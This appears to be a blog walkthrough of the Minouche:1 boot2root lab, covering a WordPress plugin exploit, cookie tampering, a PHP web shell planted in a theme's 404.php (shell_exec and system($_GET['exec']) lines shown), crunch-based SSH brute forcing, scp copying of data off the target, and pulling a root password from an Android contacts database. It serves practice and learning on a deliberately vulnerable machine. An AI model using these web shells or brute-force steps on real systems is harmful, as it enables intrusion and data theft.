Updated: Apr 25, 2020
In this article we are going to solve another boot2root challenge Minouche:1 . This is a very interesting machine and we are going to learn many new things throughout this article.
IP of the target : 192.168.43.193
First step is to find the open ports and services running in the system using the command : sudo nmap -A 192.168.43.193
Okay we have only two ports open . We decided to enumerate the HTTP Service as usual.
we found a wordpress website and now we decided to enumerate it more using wpcan ,command used : sudo wpscan --url http://192.168.43.193 --enumerate u,vp,vt
as usual like other wordpress CTF challenges we decided to do bruteforce attack to find the password but we failed to find it.
Now we run the dirb tool to find some more directories if we can find something useful information from them.
command used : sudo dirb http://192.168.43.193
These two directories looks useful for us , but /wp-admin/ requires username and password and /noindex/ is default Apache HTTP Server home page.
it seems like a dead-end for us until we found this link on the internet . Now as described in the link we again use wpscan using the command :
wpscan --url http://192.168.43.193 --wp-content-dir /wp-content/ --enumerate p --plugins-detection aggressive
we have a outdated plugin version and we decided to search on the internet to find some exploit for this plugin . luckily a python script is available on exploit-db . We downloaded the script on our local system and now lets run the script.
Now we need to pass these arguments with the script and run it again as : python exp.py -n kitty -u http://192.168.43.193
as we can see in the output that we need to use these cookies to login successfully as user kitty and then we can upload our shell and can obtain the reverse shell (looks very simple).
we change our path to /wp-admin/ and then we intercept the packet using burp suite to modify the cookie.
Now lets modify the cookie .
Forward this request and we can see now that we logged in as user kitty.
NOTE : if you are unable to login by using this method then use msfconsole , A very simple exploit is available there which will directly give you the user apache shell.
Okay , now like other CTF challenges we decided to edit the theme's 404.php file with a php reverse shell code , but when we execute the php file we don't get the reverse shell . Now with the help of simple php script we decided to traverse through the different system directories.
<?php echo "<pre>"; echo shell_exec(whoami); ?>
first of all we run very simple commands to check if everything is working fine.
now this command is working fine but when we try to execute some more command we found that we can't see the content of /home directory and also we can't execute any python script because python is not installed in the system and we can't also use nc here to take the reverse shell. Now we decided to check the main directory that is "/" using the same script but we failed to do so. Now we change our php script as .
<?php echo "<pre>"; echo system($_GET['exec']); ?>
Now we again execute this script with a GET parameter ?exec=ls / , and yes now this time we can see the content and found a very interesting file kitty.txt .
Now we decided to see the content of this file using ?exec=cd /;cat kitty.txt
Here we can use crunch tool to bruteforce the password for user kitty.
crunch 13 13 -t "$"Minouche20%% -o dict
here we make an assumption to check if the year of birth is more that 1999 or not and we are trying this to bruteforce the password for ssh.
Now we can use these credential to login to ssh as user kitty.
Now we see a android.zip file inside kitty home directory and then we decided to unzip it and we can see a new folder is created with name data .
okay , lets transfer the data folder to our linux machine , here we need to use scp as there is no other way to transfer files from targeted system to our local system.
scp -r data email@example.com:/home/yash/Desktop/vulnhub/min/
as we can see that data folder is completely transferred to our linux machine.
now we decided to look into this folder to find any useful information and after a lot of directory traversal we found the folder .
here we can see we have lot many screenshots and if we open the screenshot 16 and 20 then we got a very clear hint.
okay now we started to look around for some folder related to contact details and found a very interesting folder with some databases in
To interact with the database we write a simple python script . First of all we need to find the name of tables inside the database and then we will check the data of each table one by one.
import sqlite3 try: con = sqlite3.connect('/home/yash/Desktop/vulnhub/min/data/data/com.android.providers.contacts/databases/contacts2.db') c = con.cursor() c.execute("SELECT name FROM sqlite_master WHERE type='table';") print(c.fetchall()) except Exception as e: print(e)
now we check all the tables one by one and found the correct password in one of the tables and using that password we are in as user root .
We are root now and this completes our challenge!
Note : I am not disclosing the actual table name , perform all the steps from the beginning and find the password at your own. otherwise you will not learn anything , if you need any help then contact me at firstname.lastname@example.org :)